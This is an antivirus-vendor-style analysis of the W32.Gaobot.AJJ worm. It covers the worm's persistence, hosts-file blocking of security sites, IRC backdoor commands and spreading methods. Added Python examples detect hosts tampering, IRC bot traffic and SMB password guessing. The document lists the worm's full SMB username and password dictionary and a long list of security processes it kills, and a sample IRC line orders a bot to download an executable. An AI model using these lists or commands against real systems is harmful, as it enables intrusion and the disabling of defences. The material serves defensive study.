W32.Gaobot.AJJ

Risk Level 2: Low


Discovered: May 11, 2004
Updated: February 13, 2007 12:23:00 PM
Type: Worm
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP


When W32.Gaobot.AJJ runs, it performs the following actions:

1. Copies itself as LSMAS.exe to the %System% directory. This file name may vary.

Note: %System% is a variable. W32.Gaobot.AJJ locates the System folder and copies itself to that location. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).


2. Adds the file as a value to the registry keys:

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

so that the worm runs each time Windows starts. (RunServices is honored only by Windows 95/98/Me; on Windows NT/2000/XP the Run value alone provides the persistence.)

3. Adds the following lines to %System%\drivers\etc\hosts, so that the listed antivirus and security-vendor hostnames resolve to the loopback address and any attempt to reach those sites, including signature updates, fails:

    127.0.0.1 www.trendmicro.com
    127.0.0.1 trendmicro.com
    127.0.0.1 rads.mcafee.com
    127.0.0.1 customer.symantec.com
    127.0.0.1 liveupdate.symantec.com
    127.0.0.1 us.mcafee.com
    127.0.0.1 updates.symantec.com
    127.0.0.1 update.symantec.com
    127.0.0.1 www.nai.com
    127.0.0.1 nai.com
    127.0.0.1 secure.nai.com
    127.0.0.1 dispatch.mcafee.com
    127.0.0.1 download.mcafee.com
    127.0.0.1 www.my-etrust.com
    127.0.0.1 my-etrust.com
    127.0.0.1 mast.mcafee.com
    127.0.0.1 ca.com
    127.0.0.1 www.ca.com
    127.0.0.1 networkassociates.com
    127.0.0.1 www.networkassociates.com
    127.0.0.1 avp.com
    127.0.0.1 www.kaspersky.com
    127.0.0.1 www.avp.com
    127.0.0.1 kaspersky.com
    127.0.0.1 www.f-secure.com
    127.0.0.1 f-secure.com
    127.0.0.1 viruslist.com
    127.0.0.1 www.viruslist.com
    127.0.0.1 liveupdate.symantecliveupdate.com
    127.0.0.1 mcafee.com
    127.0.0.1 www.mcafee.com
    127.0.0.1 sophos.com
    127.0.0.1 www.sophos.com
    127.0.0.1 symantec.com
    127.0.0.1 securityresponse.symantec.com
    127.0.0.1 www.symantec.com
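A hosts-file check for the tampering in step 3, as an added example (not code from the Symantec writeup or from the worm). It generalizes the list above: instead of matching the exact hostnames, it treats any host under the registrable vendor domains as a vendor site, and it reports a mapping whether it points at 127.0.0.1, 0.0.0.0, ::1 or some other address, since a hosts entry for an antivirus update server is anomalous on a workstation however it is pointed. The sample hosts file is constructed for the demonstration.

```python
"""Flag hosts-file entries that blackhole or redirect security-vendor sites.

Added example, not code from the Symantec writeup or the worm. The vendor
domains are the registrable domains of the entries listed in step 3; the
sample hosts file below is constructed for the demonstration.
"""
import ipaddress

# Registrable domains of the sites W32.Gaobot.AJJ pins to 127.0.0.1 (from
# step 3). Any host under these domains is treated as a vendor site, so the
# check also catches hostnames a variant adds that are not listed above.
VENDOR_DOMAINS = (
    "trendmicro.com", "mcafee.com", "symantec.com", "symantecliveupdate.com",
    "nai.com", "networkassociates.com", "my-etrust.com", "ca.com",
    "avp.com", "kaspersky.com", "viruslist.com", "f-secure.com", "sophos.com",
)

# Constructed sample, not a real file: a clean localhost line, several
# worm-style loopback entries (including 0.0.0.0 and ::1 variants that the
# writeup does not list but that have the same effect), one entry that
# redirects an update server elsewhere, and an unrelated internal host.
SAMPLE_HOSTS = """# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
127.0.0.1 liveupdate.symantec.com
127.0.0.1 www.mcafee.com mcafee.com   # two names on one line
0.0.0.0 update.symantec.com
::1 securityresponse.symantec.com
192.0.2.10 download.mcafee.com
10.1.2.3 intranet.example.com
"""


def parse_hosts(text):
    """Yield (address, hostname, line_no) for every mapping in a hosts file.

    A line is '<ip> <name> [<name> ...]' with an optional '#' comment;
    names are lower-cased and a trailing dot is dropped so that
    'WWW.MCAFEE.COM.' compares equal to 'www.mcafee.com'.
    """
    for line_no, raw in enumerate(text.splitlines(), 1):
        body = raw.split("#", 1)[0].strip()
        parts = body.split()
        if len(parts) < 2:
            continue  # blank, comment-only, or an address with no names
        try:
            address = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # not a hosts mapping (e.g. a corrupt line)
        for name in parts[1:]:
            yield address, name.lower().rstrip("."), line_no


def is_vendor_host(name):
    """True if name is one of the vendor domains or a subdomain of one."""
    return any(name == d or name.endswith("." + d) for d in VENDOR_DOMAINS)


def find_tampering(text):
    """Return [(line_no, address, hostname, reason)] for every vendor host
    that is mapped at all: loopback or unspecified means the site is
    blackholed, any other address means its traffic is being redirected."""
    findings = []
    for address, name, line_no in parse_hosts(text):
        if not is_vendor_host(name):
            continue
        blackholed = address.is_loopback or address.is_unspecified
        findings.append((line_no, str(address), name,
                         "blackholed" if blackholed else "redirected"))
    return findings


if __name__ == "__main__":
    for line_no, address, name, reason in find_tampering(SAMPLE_HOSTS):
        print(f"line {line_no}: {name} -> {address} ({reason})")
```

Run it against a copy of %System%\drivers\etc\hosts pulled from a suspect machine; the "redirected" class matters as much as the "blackholed" one, because a variant that points an update server at a host it controls can serve a fake update instead of merely blocking the real one.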
4. Attempts to terminate the processes of a large number of antivirus and security applications. See Processes for a complete list.

5. Attempts to delete files and registry entries associated with other worms, and to end the following processes:
    bbeagle.exe
    d3dupdate.exe
    winsys.exe
    ssate.exe
    Ssate.exe
    i11r54n4.exe
    rate.exe
    irun4.exe
6. Opens a randomly selected TCP port and sends a copy of itself to any client that connects to that port.

7. Connects to a remote IRC server and waits for commands from the remote attacker.
This gives the attacker the ability to perform the following actions on the infected system:
    • Run commands
    • Retrieve files through FTP and HTTP
    • Retrieve data from the registry
    • Restart the computer
    • List the processes
    • Kill a particular process
    • Terminate Windows services
    • Perform HTTP, ICMP, SYN, and UDP floods
    • Retrieve the email addresses stored on the computer
    • Retrieve a list of email addresses through HTTP
    • Retrieve a given URL
    • Sniff HTTP, FTP, and IRC traffic
    • Steal the Windows product ID and the CD keys of various video games
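Step 7 is the behaviour a network defender can catch: the bot must register with the IRC server (NICK and USER) before it can receive commands, and that exchange is recognizable in the TCP payload even when the server listens on a port other than 6667. The following is an added example, not code from the writeup or from the worm: a small RFC 1459 message parser and a session summarizer that pulls out the bot's nick, the channels it joins and the messages an operator sends it. The two payloads, the server name, the channel, the nick and the ".update" command text are all invented for the demonstration; the writeup does not document the worm's actual command syntax.

```python
"""Identify an IRC bot session in captured TCP payloads, regardless of port.

Added example, not part of the Symantec writeup or the worm itself. The
two payloads below are constructed to look like a bot registering with a
C2 server and receiving an operator command; server name, channel, nick
and command text are invented for the demonstration.
"""
import re

# Well-known IRC ports; a registration seen on any other port is worth a look.
IRC_PORTS = {6660, 6661, 6662, 6663, 6664, 6665, 6666, 6667, 6668, 6669, 6697, 7000}

# RFC 1459 message: [':' prefix ' '] command middle-params [' :' trailing]
IRC_LINE = re.compile(
    r"^(?::(?P<prefix>\S+) )?"
    r"(?P<cmd>[A-Za-z]+|\d{3})"
    r"(?P<params>(?: [^: ]\S*)*)"
    r"(?: :(?P<trailing>.*))?$"
)

# Constructed traffic (not a real capture): bot registers, joins a keyed
# channel, and an operator sends it a command in that channel.
CLIENT_TO_SERVER = (
    b"NICK bot-7f3a\r\n"
    b"USER xp 0 0 :xp\r\n"
    b"JOIN #c0ntrol secretkey\r\n"
    b"PONG :irc.example.net\r\n"
)
SERVER_TO_CLIENT = (
    b":irc.example.net 001 bot-7f3a :Welcome to the network\r\n"
    b":bot-7f3a!xp@10.0.0.5 JOIN :#c0ntrol\r\n"
    b":op!op@198.51.100.7 PRIVMSG #c0ntrol :.update http://198.51.100.7/x.exe\r\n"
    b"PING :irc.example.net\r\n"
)
HTTP_REQUEST = b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n"


def parse_irc(payload):
    """Split a raw payload into IRC messages as (prefix, COMMAND, [params]).

    The trailing parameter (after ' :') is appended as the last param.
    Lines that do not parse as IRC are skipped rather than rejected, so a
    stray HTTP header in the same payload does not abort the parse.
    """
    messages = []
    for raw in payload.decode("latin-1").split("\n"):
        line = raw.rstrip("\r")
        if not line:
            continue
        m = IRC_LINE.match(line)
        if not m:
            continue
        params = m.group("params").split()
        if m.group("trailing") is not None:
            params.append(m.group("trailing"))
        messages.append((m.group("prefix"), m.group("cmd").upper(), params))
    return messages


def sender_nick(prefix):
    """'nick!user@host' -> 'nick'; a server prefix is returned unchanged."""
    return prefix.split("!", 1)[0] if prefix else None


def summarize_session(client_payload, server_payload, dst_port):
    """Decide whether the session is IRC and extract the bot's identity,
    the channels it joined and the messages pushed to it from the server."""
    from_client = parse_irc(client_payload)
    from_server = parse_irc(server_payload)
    client_cmds = {cmd for _, cmd, _ in from_client}
    # Registration (NICK plus USER from the client) is the reliable marker;
    # a lone PING/PONG or a line that merely parses is not enough.
    is_irc = {"NICK", "USER"} <= client_cmds
    nick = next((p[0] for _, cmd, p in from_client if cmd == "NICK" and p), None)
    channels = sorted({ch for _, cmd, p in from_client if cmd == "JOIN" and p
                       for ch in p[0].split(",")})
    operator_messages = [(sender_nick(prefix), p[0], p[1])
                         for prefix, cmd, p in from_server
                         if cmd == "PRIVMSG" and len(p) >= 2]
    return {
        "is_irc": is_irc,
        "nonstandard_port": is_irc and dst_port not in IRC_PORTS,
        "nick": nick,
        "channels": channels,
        "operator_messages": operator_messages,
    }


if __name__ == "__main__":
    print(summarize_session(CLIENT_TO_SERVER, SERVER_TO_CLIENT, 5555))
```

Feed it the reassembled client and server halves of one TCP stream (from a capture, not individual packets, since IRC lines can straddle segment boundaries). The channel name and any channel key in the JOIN are the pivot for finding other infected hosts on the same network: every bot in the same botnet joins the same channel.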
8. Attempts to spread to other systems by:
    • Sending itself to the back door port that the Beagle family of worms opens.
    • Sending itself to the back door port that the Mydoom family of worms opens.
    • Exploiting the Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability (BID 8205).
    • Exploiting the Microsoft Windows Workstation Service Remote Buffer Overflow Vulnerability (BID 9011).
    • Exploiting the Microsoft Windows WebDAV Buffer Overflow Vulnerability (BID 7116).
    • Exploiting the Microsoft UPnP NOTIFY Buffer Overflow Vulnerability (BID 3723).
    • Exploiting the Microsoft SQL Server Web Task Stored Procedure Privilege Escalation Vulnerability (BID 5980).
    • Exploiting the Microsoft Windows Local Security Authority Service Remote Buffer Overflow (BID 10108).
9. Attempts to copy itself to other computers through the following administrative and default SMB shares:
    • admin$
    • print$
    • ipc$
    • e$
    • d$
    • c$
    • c

    by using the following usernames and passwords:


    Usernames:
      "Administrator"
      "Administrateur"
      "Coordinatore"
      "Administrador"
      "Verwalter"
      "Ospite"
      "kanri"
      "kanri-sha"
      "admin"
      "administrator"
      "Default"
      "Convidado"
      "mgmt"
      "Standard"
      "User"
      "administrador"
      "Owner"
      "user"
      "server"
      "Test"
      "Guest"
      "Gast"
      "Inviter"
      "a"
      "aaa"
      "abc"
      "x"
      "xyz"
      "Dell"
      "home"
      "pc"
      "test"
      "temp"
      "win"
      "asdf"
      "qwer"
      "OEM"
      "root"
      "wwwadmin"
      "login"
      "owner"
      "mary"
      "mike"
      "george"
      "jim"
      "tim"
      "tom"
      "stacy"
      "stacey"
      "colin"
      "mark"
      "erik"
      "peter"
      "patrick"
      "bill"
      "steve"
      "dick"
      "stefan"
      "steven"
      "kate"
      "kt"
      "karl"
      "mypc"
      "admins"
      "computer"
      "xp"
      "OWNER"
      "mysql"
      "sql"
      "database"
      "teacher"
      "student"

      Passwords:

      "admin"
      "Admin"
      "password"
      "Password"
      "12"
      "123"
      "1234"
      "beer"
      "!@#$"
      "asdfgh"
      "!@#$%"
      "!@#$%^"
      "!@#$%^&"
      "!@#$%^&*"
      "WindowsXP"
      "windows2k"
      "windowsME"
      "windows98"
      "windoze"
      "hax"
      "dude"
      "owned"
      "lol"
      "ADMINISTRATOR"
      "rooted"
      "noob"
      "TEMP"
      "share"
      "r00t"
      "freak"
      "ROOT"
      "TEST"
      "SYSTEM"
      "LOCAL"
      "SERVER"
      "ACCESS"
      "BACKUP"
      "computer"
      "fucked"
      "gay"
      "idiot"
      "Internet"
      "test"
      "2003"
      "2004"
      "backdoor"
      "whore"
      "wh0re"
      "CNN"
      "pwned"
      "own"
      "crash"
      "passwd"
      "PASSWD"
      "iraq"
      "devil"
      "linux"
      "UNIX"
      "feds"
      "fish"
      "changeme"
      "ASP"
      "PHP"
      "666"
      "BOX"
      "Box"
      "box"
      "12345"
      "123456"
      "1234567"
      "12345678"
      "123456789"
      "654321"
      "54321"
      "111"
      "000000"
      "00000000"
      "11111111"
      "88888888"
      "fanny"
      "pass"
      "passwd"
      "database"
      "abcd"
      "oracle"
      "sybase"
      "123qwe"
      "fool"
      "server"
      "computer"
      "Internet"
      "super"
      "123asd"
      "ihavenopass"
      "West"
      "godblessyou"
      "enable"
      "xp"
      "23"
      "2002"
      "2600"
      "0"
      "110"
      "2525"
      "newfy"
      "111111"
      "121212"
      "123123"
      "1234qwer"
      "123abc"
      "007"
      "alpha"
      "1776"
      "newfie"
      "patrick"
      "pat"
      "administrator"
      "root"
      "sex"
      "god"
      "foobar"
      "1778"
      "a"
      "aaa"
      "abc"
      "test"
      "temp"
      "win"
      "pc"
      "asdf"
      "secret"
      "drugs"
      "qwer"
      "yxcv"
      "zxcv"
      "home"
      "xxx"
      "owner"
      "login"
      "Login"
      "west"
      "Coordinatore"
      "Administrador"
      "Verwalter"
      "Ospite"
      "administrator"
      "Default"
      "administrador"
      "admins"
      "teacher"
      "student"
      "superman"
      "wmd"
      "supersecret"
      "kids"
      "penis"
      "wwwadmin"
      "database"
      "changeme"
      "dope"
      "test123"
      "user"
      "private"
      "69"
      "root"
      "654321"
      "xxyyzz"
      "asdfghjkl"
      "mybaby"
      "vagina"
      "pussy"
      "leet"
      "metal"
      "work"
      "school"
      "mybox"
      "box"
      "werty"
      "baby"
      "porn"
      "homework"
      "secrets"
      "x"
      "z"
      "bong"
      "qwertyuiop"
      "secret"
      "Administrateur"
      "abc123"
      "password123"
      "red123"
      "qwerty"
      "admin123"
      "zxcvbnm"
      "poiuytrewq"
      "pwd"
      "pass"
      "love"
      "mypc"
      "texas"
      "Texas"
      "Washington"
      "washington"
      "Tennessee"
      "tennessee"
      "jackdaniels"
      "whisky"
      "whiskey"
      "azerty"
      "poiut"
      "mouse"
      "ordinateur"
      "souris"
      "imprimeur"
      "cederom"
      "cédérom"
      "bière"
      "biere"
      "moonshine"
      "athlon"
      "oil"
      "opteron"
      "écran"
      "ecran"
      "reseau"
      "carte"
      "merde"
      "mince"
      "ami"
      "amie"
      "copin"
      "copine"
      "42"
      "harry"
      "dumbledore"
      "hagrid"
      "potter"
      "hermione"
      "hermine"
      "gryffindor"
      "azkaban"
      "askaban"
      "cauldron"
      "buckbeak"
      "hogwarts"
      "dementor"
      "quidditch"
      "madre"
      "switch"
      "mypass"
      "pw"

10. Copies itself to, and executes itself on, any remote share to which it successfully authenticates.

11. Schedules a job on the remote system, through its scheduler service, so that the copied file runs there.
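Steps 9 to 11 leave a distinctive trail on the target: a burst of failed network logons from one source against many of the account names listed above, often followed by a successful network logon from the same source once a weak password hits. The following is an added example, not code from the writeup or from the worm, showing that detection over a security-log export. The event IDs (529 and 4625 for a failed logon, 540 and 4624 for a successful one) and logon type 3 (network, which is what an SMB share connection produces) are Windows' own; the CSV log, the thresholds and the column layout are constructed assumptions for the demonstration.

```python
"""Detect SMB credential guessing of the kind step 9 describes, from a
Windows security-log export.

Added example, not part of the Symantec writeup. Event IDs 529/4625
(failed logon), 540/4624 (successful logon) and logon type 3 (network)
are Windows' own; the CSV below, its column names and the detection
thresholds are constructed for the demonstration and are not a real log.
"""
import csv
from collections import defaultdict
from datetime import datetime, timedelta
from io import StringIO

FAILED_LOGON = {529, 4625}
SUCCESSFUL_LOGON = {540, 4624}
NETWORK_LOGON = 3  # SMB share connections are type 3 logons

# Constructed sample: one host hammers six of the worm's usernames inside a
# few seconds and then gets in as Administrator; a second host has a user
# mistyping one password a few times, which must not be flagged.
SAMPLE_LOG = """\
time,event_id,logon_type,source_ip,target_user
2004-05-11T09:00:01,529,3,10.0.0.5,Administrator
2004-05-11T09:00:01,529,3,10.0.0.5,Administrator
2004-05-11T09:00:02,529,3,10.0.0.5,admin
2004-05-11T09:00:02,529,3,10.0.0.5,Guest
2004-05-11T09:00:03,529,3,10.0.0.5,root
2004-05-11T09:00:03,529,3,10.0.0.5,Owner
2004-05-11T09:00:04,529,3,10.0.0.5,test
2004-05-11T09:00:05,540,3,10.0.0.5,Administrator
2004-05-11T09:05:00,529,3,10.0.0.9,jsmith
2004-05-11T09:06:10,529,3,10.0.0.9,jsmith
2004-05-11T09:07:30,529,2,10.0.0.9,jsmith
"""


def parse_log(text):
    """Parse the CSV export into dicts with typed fields, oldest first."""
    rows = []
    for r in csv.DictReader(StringIO(text)):
        rows.append({
            "time": datetime.fromisoformat(r["time"]),
            "event_id": int(r["event_id"]),
            "logon_type": int(r["logon_type"]),
            "source_ip": r["source_ip"],
            "target_user": r["target_user"],
        })
    return sorted(rows, key=lambda r: r["time"])


def detect_spray(rows, window=timedelta(seconds=60), min_failures=5, min_accounts=3):
    """Return {source_ip: finding} for every source whose network-logon
    failures reach min_failures attempts against min_accounts distinct
    accounts inside one sliding window, keeping the widest such burst and
    noting a network logon success from that source after the burst began."""
    by_source = defaultdict(list)
    for r in rows:
        if r["logon_type"] == NETWORK_LOGON:
            by_source[r["source_ip"]].append(r)

    findings = {}
    for src, events in by_source.items():
        failures = [e for e in events if e["event_id"] in FAILED_LOGON]
        start = 0
        for end in range(len(failures)):
            # Advance the window start until the burst fits inside `window`.
            while failures[end]["time"] - failures[start]["time"] > window:
                start += 1
            burst = failures[start:end + 1]
            accounts = {e["target_user"].lower() for e in burst}
            if len(burst) < min_failures or len(accounts) < min_accounts:
                continue
            if src in findings and findings[src]["failures"] >= len(burst):
                continue
            success = next((e for e in events
                            if e["event_id"] in SUCCESSFUL_LOGON
                            and e["time"] >= failures[start]["time"]), None)
            findings[src] = {
                "failures": len(burst),
                "accounts": sorted(accounts),
                "first": failures[start]["time"],
                "last": failures[end]["time"],
                "success_after_burst": success["target_user"] if success else None,
            }
    return findings


if __name__ == "__main__":
    for src, f in detect_spray(parse_log(SAMPLE_LOG)).items():
        print(src, f)
```

The thresholds are deliberately low because the worm's dictionary is small and it works through it quickly; tune them to the environment. A finding whose success_after_burst is set is the case to treat as a compromise rather than an attempt: the worm then copies itself over the admin share and schedules it to run, as steps 10 and 11 describe, so the next place to look is the target's %System% directory and scheduled jobs.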


    Processes

    W32.Gaobot.AJJ attempts to end the following processes, as mentioned in Step 4:

      F-AGOBOT.EXE
      HIJACKTHIS.EXE
      _AVPM.EXE
      _AVPCC.EXE
      _AVP32.EXE
      ZONEALARM.EXE
      ZONALM2601.EXE
      ZATUTOR.EXE
      ZAPSETUP3001.EXE
      ZAPRO.EXE
      XPF202EN.EXE
      WYVERNWORKSFIREWALL.EXE
      WUPDT.EXE
      WUPDATER.EXE
      WSBGATE.EXE
      WRCTRL.EXE
      WRADMIN.EXE
      WNT.EXE
      WNAD.EXE
      WKUFIND.EXE
      WINUPDATE.EXE
      WINTSK32.EXE
      WINSTART001.EXE
      WINSTART.EXE
      WINSSK32.EXE
      WINSERVN.EXE
      WINRECON.EXE
      WINPPR32.EXE
      WINNET.EXE
      WINMAIN.EXE
      WINLOGIN.EXE
      WININITX.EXE
      WININIT.EXE
      WININETD.EXE
      WINDOWS.EXE
      WINDOW.EXE
      WINACTIVE.EXE
      WIN32US.EXE
      WIN32.EXE
      WIN-BUGSFIX.EXE
      WIMMUN32.EXE
      WHOSWATCHINGME.EXE
      WGFE95.EXE
      WFINDV32.EXE
      WEBTRAP.EXE
      WEBSCANX.EXE
      WEBDAV.EXE
      WATCHDOG.EXE
      W9X.EXE
      W32DSM89.EXE
      VSWINPERSE.EXE
      VSWINNTSE.EXE
      VSWIN9XE.EXE
      VSSTAT.EXE
      VSMON.EXE
      VSMAIN.EXE
      VSISETUP.EXE
      VSHWIN32.EXE
      VSECOMR.EXE
      VSCHED.EXE
      VSCENU6.02D30.EXE
      VSCAN40.EXE
      VPTRAY.EXE
      VPFW30S.EXE
      VPC42.EXE
      VPC32.EXE
      VNPC3000.EXE
      VNLAN300.EXE
      VIRUSMDPERSONALFIREWALL.EXE
      VIR-HELP.EXE
      VFSETUP.EXE
      VETTRAY.EXE
      VET95.EXE
      VET32.EXE
      VCSETUP.EXE
      VBWINNTW.EXE
      VBWIN9X.EXE
      VBUST.EXE
      VBCONS.EXE
      VBCMSERV.EXE
      UTPOST.EXE
      UPGRAD.EXE
      UPDAT.EXE
      UNDOBOOT.EXE
      TVTMD.EXE
      TVMD.EXE
      TSADBOT.EXE
      TROJANTRAP3.EXE
      TRJSETUP.EXE
      TRJSCAN.EXE
      TRICKLER.EXE
      TRACERT.EXE
      TITANINXP.EXE
      TITANIN.EXE
      TGBOB.EXE
      TFAK5.EXE
      TFAK.EXE
      TEEKIDS.EXE
      TDS2-NT.EXE
      TDS2-98.EXE
      TDS-3.EXE
      TCM.EXE
      TCA.EXE
      TC.EXE
      TBSCAN.EXE
      TAUMON.EXE
      TASKMON.EXE
      TASKMO.EXE
      TASKMG.EXE
      SYSUPD.EXE
      SYSTEM32.EXE
      SYSTEM.EXE
      SYSEDIT.EXE
      SYMTRAY.EXE
      SYMPROXYSVC.EXE
      SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE
      SWEEP95.EXE
      SVSHOST.EXE
      SVCHOSTS.EXE
      SVCHOSTC.EXE
      SVC.EXE
      SUPPORTER5.EXE
      SUPPORT.EXE
      SUPFTRL.EXE
      STCLOADER.EXE
      START.EXE
      ST2.EXE
      SSG_4104.EXE
      SSGRATE.EXE
      SS3EDIT.EXE
      SRNG.EXE
      SREXE.EXE
      SPYXX.EXE
      SPOOLSV32.EXE
      SPOOLCV.EXE
      SPOLER.EXE
      SPHINX.EXE
      SPF.EXE
      SPERM.EXE
      SOFI.EXE
      SOAP.EXE
      SMSS32.EXE
      SMS.EXE
      SMC.EXE
      SHOWBEHIND.EXE
      SHN.EXE
      UPDATE.EXE
      SHELLSPYINSTALL.EXE
      SH.EXE
      SGSSFW32.EXE
      SFC.EXE
      SETUP_FLOWPROTECTOR_US.EXE
      SETUPVAMEEVAL.EXE
      SERVLCES.EXE
      SERVLCE.EXE
      SERVICE.EXE
      SERV95.EXE
      SD.EXE
      SCVHOST.EXE
      SCRSVR.EXE
      SCRSCAN.EXE
      SCANPM.EXE
      SCAN95.EXE
      SCAN32.EXE
      SCAM32.EXE
      SC.EXE
      SBSERV.EXE
      SAVENOW.EXE
      SAVE.EXE
      SAHAGENT.EXE
      SAFEWEB.EXE
      RUXDLL32.EXE
      RUNDLL16.EXE
      RUNDLL.EXE
      RUN32DLL.EXE
      RULAUNCH.EXE
      RTVSCN95.EXE
      RTVSCAN.EXE
      RSHELL.EXE
      RRGUARD.EXE
      RESCUE32.EXE
      RESCUE.EXE
      REGEDT32.EXE
      REGEDIT.EXE
      REGED.EXE
      REALMON.EXE
      RCSYNC.EXE
      RB32.EXE
      RAY.EXE
      RAV8WIN32ENG.EXE
      RAV7WIN.EXE
      RAV7.EXE
      RAPAPP.EXE
      QSERVER.EXE
      QCONSOLE.EXE
      PVIEW95.EXE
      PUSSY.EXE
      PURGE.EXE
      PSPF.EXE
      PROTECTX.EXE
      PROPORT.EXE
      PROGRAMAUDITOR.EXE
      PROCEXPLORERV1.0.EXE
      PROCESSMONITOR.EXE
      PROCDUMP.EXE
      PRMVR.EXE
      PRMT.EXE
      PRIZESURFER.EXE
      PPVSTOP.EXE
      PPTBC.EXE
      PPINUPDT.EXE
      POWERSCAN.EXE
      PORTMONITOR.EXE
      PORTDETECTIVE.EXE
      POPSCAN.EXE
      POPROXY.EXE
      POP3TRAP.EXE
      PLATIN.EXE
      PINGSCAN.EXE
      PGMONITR.EXE
      PFWADMIN.EXE
      PF2.EXE
      PERSWF.EXE
      PERSFW.EXE
      PERISCOPE.EXE
      PENIS.EXE
      PDSETUP.EXE
      PCSCAN.EXE
      PCIP10117_0.EXE
      PCFWALLICON.EXE
      PCDSETUP.EXE
      PCCWIN98.EXE
      PCCWIN97.EXE
      PCCNTMON.EXE
      PCCIOMON.EXE
      PCC2K_76_1436.EXE
      PCC2002S902.EXE
      PAVW.EXE
      PAVSCHED.EXE
      PAVPROXY.EXE
      PAVCL.EXE
      PATCH.EXE
      PANIXK.EXE
      PADMIN.EXE
      OUTPOSTPROINSTALL.EXE
      OUTPOSTINSTALL.EXE
      OTFIX.EXE
      OSTRONET.EXE
      OPTIMIZE.EXE
      ONSRVR.EXE
      OLLYDBG.EXE
      NWTOOL16.EXE
      NWSERVICE.EXE
      NWINST4.EXE
      NVSVC32.EXE
      NVC95.EXE
      NVARCH16.EXE
      NUI.EXE
      NTXconfig.EXE
      NTVDM.EXE
      NTRTSCAN.EXE
      NT.EXE
      NSUPDATE.EXE
      NSTASK32.EXE
      NSSYS32.EXE
      NSCHED32.EXE
      NPSSVC.EXE
      NPSCHECK.EXE
      NPROTECT.EXE
      NPFMESSENGER.EXE
      NPF40_TW_98_NT_ME_2K.EXE
      NOTSTART.EXE
      NORTON_INTERNET_SECU_3.0_407.EXE
      NORMIST.EXE
      NOD32.EXE
      NMAIN.EXE
      NISUM.EXE
      NISSERV.EXE
      NETUTILS.EXE
      NETSTAT.EXE
      NETSPYHUNTER-1.2.EXE
      NETSCANPRO.EXE
      NETMON.EXE
      NETINFO.EXE
      NETD32.EXE
      NETARMOR.EXE
      NEOWATCHLOG.EXE
      NEOMONITOR.EXE
      NDD32.EXE
      NCINST4.EXE
      NC2000.EXE
      NAVWNT.EXE
      NAVW32.EXE
      NAVSTUB.EXE
      NAVNT.EXE
      NAVLU32.EXE
      NAVENGNAVEX15.NAVLU32.EXE
      NAVDX.EXE
      NAVAPW32.EXE
      NAVAPSVC.EXE
      NAVAP.NAVAPSVC.EXE
      AUTO-PROTECT.NAV80TRY.EXE
      NAV.EXE
      OUTPOST.EXE
      NUPGRADE.EXE
      N32SCANW.EXE
      MWATCH.EXE
      MU0311AD.EXE
      MSVXD.EXE
      MSSYS.EXE
      MSSMMC32.EXE
      MSMSGRI32.EXE
      MSMGT.EXE
      MSLAUGH.EXE
      MSINFO32.EXE
      MSIEXEC16.EXE
      MSDOS.EXE
      MSDM.EXE
      MSCONFIG.EXE
      MSCMAN.EXE
      MSCCN32.EXE
      MSCACHE.EXE
      MSBLAST.EXE
      MSBB.EXE
      MSAPP.EXE
      MRFLUX.EXE
      MPFTRAY.EXE
      MPFSERVICE.EXE
      MPFAGENT.EXE
      MOSTAT.EXE
      MOOLIVE.EXE
      MONITOR.EXE
      MMOD.EXE
      MINILOG.EXE
      MGUI.EXE
      MGHTML.EXE
      MGAVRTE.EXE
      MGAVRTCL.EXE
      MFWENG3.02D30.EXE
      MFW2EN.EXE
      MFIN32.EXE
      MD.EXE
      MCVSSHLD.EXE
      MCVSRTE.EXE
      MCTOOL.EXE
      MCSHIELD.EXE
      MCMNHDLR.EXE
      MCAGENT.EXE
      MAPISVC32.EXE
      LUSPT.EXE
      LUINIT.EXE
      LUCOMSERVER.EXE
      LUAU.EXE
      LSETUP.EXE
      LORDPE.EXE
      LOOKOUT.EXE
      LOCKDOWN2000.EXE
      LOCKDOWN.EXE
      LOCALNET.EXE
      LOADER.EXE
      LNETINFO.EXE
      LDSCAN.EXE
      LDPROMENU.EXE
      LDPRO.EXE
      LDNETMON.EXE
      LAUNCHER.EXE
      KILLPROCESSSETUP161.EXE
      KERNEL32.EXE
      KERIO-WRP-421-EN-WIN.EXE
      KERIO-WRL-421-EN-WIN.EXE
      KERIO-PF-213-EN-WIN.EXE
      KEENVALUE.EXE
      KAZZA.EXE
      KAVPF.EXE
      KAVPERS40ENG.EXE
      KAVLITE40ENG.EXE
      JEDI.EXE
      JDBGMRG.EXE
      JAMMER.EXE
      ISTSVC.EXE
      MCUPDATE.EXE
      LUALL.EXE
      ISRV95.EXE
      ISASS.EXE
      IRIS.EXE
      IPARMOR.EXE
      IOMON98.EXE
      INTREN.EXE
      INTDEL.EXE
      INIT.EXE
      INFWIN.EXE
      INFUS.EXE
      INETLNFO.EXE
      IFW2000.EXE
      IFACE.EXE
      IEXPLORER.EXE
      IEDRIVER.EXE
      IEDLL.EXE
      IDLE.EXE
      ICSUPPNT.EXE
      ICMON.EXE
      ICLOADNT.EXE
      ICLOAD95.EXE
      IBMAVSP.EXE
      IBMASN.EXE
      IAMSTATS.EXE
      IAMSERV.EXE
      IAMAPP.EXE
      HXIUL.EXE
      HXDL.EXE
      HWPE.EXE
      HTPATCH.EXE
      HTLOG.EXE
      HOTPATCH.EXE
      HOTACTIO.EXE
      HBSRV.EXE
      HBINST.EXE
      HACKTRACERSETUP.EXE
      GUARDDOG.EXE
      GUARD.EXE
      GMT.EXE
      GENERICS.EXE
      GBPOLL.EXE
      GBMENU.EXE
      GATOR.EXE
      FSMB32.EXE
      FSMA32.EXE
      FSM32.EXE
      FSGK32.EXE
      FSAV95.EXE
      FSAV530WTBYB.EXE
      FSAV530STBYB.EXE
      FSAV32.EXE
      FSAV.EXE
      FSAA.EXE
      FRW.EXE
      FPROT.EXE
      FP-WIN_TRIAL.EXE
      FP-WIN.EXE
      FNRB32.EXE
      FLOWPROTECTOR.EXE
      FIREWALL.EXE
      FINDVIRU.EXE
      FIH32.EXE
      FCH32.EXE
      FAST.EXE
      FAMEH32.EXE
      F-STOPW.EXE
      F-PROT95.EXE
      F-PROT.EXE
